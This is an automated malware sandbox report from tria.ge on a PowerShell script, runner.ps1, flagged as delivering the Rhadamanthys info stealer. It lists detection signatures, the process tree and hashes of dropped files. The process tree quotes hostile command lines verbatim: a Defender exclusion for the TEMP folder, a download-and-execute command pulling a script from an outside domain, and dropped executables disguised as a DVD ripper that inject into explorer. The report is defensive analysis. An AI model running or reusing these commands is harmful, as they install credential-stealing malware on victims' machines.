Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
-
submitted
06/02/2025, 16:26
General
-
Target
runner.ps1
-
Size
276KB
-
MD5
e255c745717b00f238c5b41aa2196153
-
SHA1
4aea97c6ecbd3de68791cc2591c930965962d6e7
-
SHA256
47dc344e945a0170c1f69caf1cf5d63bca22239e17f7df1a01e6235484fa0593
-
SHA512
7e155e523a895bf2bd97ba41316c674a828948c3d6ee7f49c2b2342188d76c53a29bef819a4ec3533106f841b021153ec9f18cfd2f2db6fd01d1d15d06e5468d
-
SSDEEP
1536:iQEjSvrxQrgoc7I5eFgk7OQdjdlYG76p/zIOO5Ys:O2vtQrO7I5eFgk7OQd0g6p/NO5Ys
Malware Config
Signatures
-
Detects Rhadamanthys payload 3 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\runner.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows \System32\WmiMgmt.msc"2⤵
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'https://global-protect.us/encrypthub/ram/ram.ps1' | Invoke-Expression"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\transport.exe"C:\Users\Admin\AppData\Local\Temp\transport.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\{28CDD7FA-D1A4-416A-B3F1-C30280BD0DAE}\.cr\transport.exe"C:\Windows\TEMP\{28CDD7FA-D1A4-416A-B3F1-C30280BD0DAE}\.cr\transport.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\transport.exe" -burn.filehandle.attached=596 -burn.filehandle.self=5925⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\{E06B3AFA-A3EB-44A9-B8DE-35B7917BE0C5}\.ba\WinX_DVD_Ripper_Platinum.exeC:\Windows\TEMP\{E06B3AFA-A3EB-44A9-B8DE-35B7917BE0C5}\.ba\WinX_DVD_Ripper_Platinum.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Dn_explore_test\WinX_DVD_Ripper_Platinum.exeC:\Users\Admin\AppData\Roaming\Dn_explore_test\WinX_DVD_Ripper_Platinum.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {taskkill /f /im mmc.exe}3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im mmc.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5edff8411b90eb97d31dd00831bd9afb2
SHA129af749a3576d0c88c54e75c63ec59579dfe2b2d
SHA2569cce910fd370ca538c37d328df605fa870a09db90244ca17cde0cc75ac059edc
SHA512fa9bd63dcdb2934705f186edcf5db38009573e9e304ec2b21de47387c27acf51d84e4f61ebc98d22812d1b7df4c70a2354e4a623368b50d8c0f15aca25fb34e8
-
Filesize
1KB
MD5c8437baf324a5fc1037c2deb741a5600
SHA1f36f2ddf66ca25641763a57c1eea1f1bb03fd40e
SHA25639b8e9a66ec567562cb20e9b4208cd26db11154209bc7e2a60659c8bef92fb6c
SHA5125be3bc0d4bd7c5e06c96549d9e91c003d903eec5764d466367f89e669f05cddfa0f029699a4c7ed42c24028423ce2f6621469b19eef3bbe5ad76c42a35c552b2
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1.1MB
MD52fd757e2f09809459e59ae4685f5366a
SHA1a4f7c95b2a46affb9c1b5478ab2be93175bc4484
SHA256bb4df75963154bb1caabb2225f859afad062690b26d80aa5711e63472fdf4f09
SHA512259ea002f173227c87b2131055fcf6d7f4c503129e24fa1192f53c0ba447b6c28350166f5245377603ba927d2a154b4dff43582b80daea589622e048bc38e45a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.8MB
MD572ec64d0bc0b31f8842c9b5d488c11e7
SHA185d81edeac18c67d6c8b73ab628347586a5039ad
SHA256019e368cdfe9e71959dfc32917463653dfa4c35c129f1feb1fe492187d46a22a
SHA512e2d42b2f43916cd1191994b9f21b5961b965b23ac0ae87f679bcb13cf97f030e656f4e8eaec493dbcd54b9702e062eac02c761d14557bf20d8e00e02fcb993e0
-
Filesize
6KB
MD5339e9a77b87c614952f666d2741ce2ea
SHA1d571374386817e6fb9e3d936678ea1953e3a46a8
SHA25679bc9f1195cf181df5f27a67f8717c3adad520fa18feaf41512962fe0774c7f0
SHA512fc73ba9acd664cf5e0facfbcaf1dfe3ddf3e2cacb0e5397313fd821cfa71461fe0a33291465cced958066cda1fa838af38beaa47731606b882bbd27f46a2498e
-
Filesize
6KB
MD57418545ca7ef6aacee07b823ab5ad5c5
SHA198ed3b359243575c106834e59496d49178943581
SHA2561dcea84b3b3bb0850d54b2122c6668a5edf676b5e13f6133330dc0c5f99124f5
SHA5125d4b7da4cb7c105026a5f17d027f50758d1f8d43f15344e3333748468d199dfccdc8861183e4af13328936bf0b6f5bb531d56d7e6ed1edc5ce7fb59dd89f1894
-
Filesize
6KB
MD58da40a1364f4f3eaa8f43b2644be3b7b
SHA1faf992f68c95eaff2a9f90f74f5d7e4ff6e66c0c
SHA256171e59d819678100c40d23aee0a65438ca6b73ccb601f32e71c63d0feebde6ab
SHA512cd59377da3e3c5ccd39e7be7f5707ef7e01f36a1648008cce08c7f757b54704f1d98c355e7667e212458bd4e8e0de94b0cd76dbb5c21b09fed7766e6da4ef866
-
Filesize
141KB
MD5e0addce97ee521c9ac4f53ee17a05bd5
SHA12f8dd03b0433fa5d511ab80546a95037a1eb178d
SHA256e18a549b10943645361372ebb7871fd23a0608a84ae0405ff1be946ab8bdc1ee
SHA512d396b8b2d86d7331cac2e183b869224905a3ff7cf33300cd60dd8e5e55bf31d6170322624ee3ae18ff41d647c1e65177252654a64ff5fe5c74778f17e6ecfcd4
-
Filesize
65KB
MD5386e3a5a3f3a3815a1a8d5411c1dbb4a
SHA1b88571fa0fb81d8440a8bd919646020d88908520
SHA2564c0e219fb4e6046f58050e93d9c34132df55cb5cf7a263262e0497129f09d8e8
SHA512e5ce38d9eb11cc0d0bf66062ba457c8167c9f77b02e58bc14183db04756d9898fe93fde524ee673f8c71ce8948daa529a723a724d4f080c69a4e221e78e72b6a
-
Filesize
241KB
MD5a957f7e18d5493a99d151ff504214d09
SHA1cfdb6cb20382b68888b0efd8e761649d60c0a7b5
SHA2563cb6f7bbefac6d1fa487ddaec82d4565cf2f564ec5f14eca1cbd5c987735ae9a
SHA51280d3f142a637545255eefb73a20e278c0fdaf832b5a221e4588c4469ac8177f166d176262c86c7f8c90e5293992c2566b35703a2333507f4f3756f375d620bbe
-
Filesize
863KB
MD5d1f6010adeeeb153fcbf492a2013176d
SHA1990b47b4948badd2b9499f2ca2bc065a639a6bdd
SHA2564647a4cbd1b866fa7425682aefdd5236812ce099e37d5f21a973eaea694182da
SHA5124bc78c048a8a70beeb096bcf7b93410f67752df9cb1029279b689dd119c8feaf40cda0634f5d259b5b7ec3aac4a647451e51de47312a94b200c4d99c4a42d70c
-
Filesize
45KB
MD563afa5cdf59535a6ee3a44c29972f740
SHA190d721394d8c683078a146253f8e903767d6cae3
SHA256e63d72eb447dba2e5110fe4cae4483f6395272ce26b79638ced29116037facef
SHA5121d6c895aa0d3b02cf5e11ee50a8b9d57b6ef796a2adca5f092cf7f65a4d7cfe380c573e628d72fb59cbb304c5bf4620b1cb951d27969af3bf98e58034ce7cfd2
-
Filesize
6.8MB
MD593860d60d2df0f9da732e45513e7ba5d
SHA1ce6acbd9d61da9d988fb86a01daebecd0291d005
SHA2569366725e71cf2999398b7b257286637b9fcb11d8b49a4afb96649921dfb31b1b
SHA512e62d5ff6e85e053b22d4f4eb36d3da3336bf38d4bc5c95d8f800f7a81afad8a472075347756d1beb16e523b5a657a65379c01b8ef5b1143025c7a2e57e2288b3
-
Filesize
130KB
MD520aa36c2ce87d64cb58e7e32f0546fb1
SHA1d65d8b30c3343c4f22d2765325f7e518ba5cec2e
SHA25655285f72c479667b7e4c395ec503f81e5ef560d224a0ffc5347dcb44b2bcd394
SHA5125ab90561dc204402bfb4e7a7931f68bcbe73b2bae3e2999f8421406b0edf4225c1b1cebc8d888b59d0c936c71fbe4da99a3f7366c48196d578dcfe65051a5514
-
Filesize
15.1MB
MD53c64548b4aedbd79411d69029bdae67f
SHA1c27d42f5984ec27f63db147dfec7828c1c877990
SHA2561f7a9cf0f11e5d30538e7162aa69c9216839dda3928b25368434f7e6e96ea0fb
SHA512f61f2de84b61a6f8dfa943435d1ad0230df5c71081a5e642a95c35ce5b0ac7849d903ffc2985ba13cdbd457615150a3ed88d6bde2a9744d938ecb8f80305c842
-
Filesize
1.0MB
MD573a8cdc0bb5b95c1ba6deb39d71f0349
SHA1bef1bb7843d0e424d55203bfa6fa3f40eedc9379
SHA256639980c48dd692e9ff3144f3d932aa07e501f12197d587ec47eb5ec8f6b7696a
SHA5127f81a44da7d6849f78d9eb6610831fc1c2aa6a76f986bd6d1f11ac79565189497c16ac76902750d101c97082915c6db267df4260eb48a0de1d88744a75e14722
-
Filesize
2.0MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
15.2MB
-
Filesize
1.8MB
-
Filesize
524KB
-
Filesize
2.1MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
524KB
-
Filesize
2.0MB
-
Filesize
524KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
2.0MB
-
Filesize
1.5MB
-
Filesize
2.0MB
-
Filesize
1.5MB
-
Filesize
15.2MB
-
Filesize
40KB
-
Filesize
4.0MB
-
Filesize
2.0MB
-
Filesize
2.1MB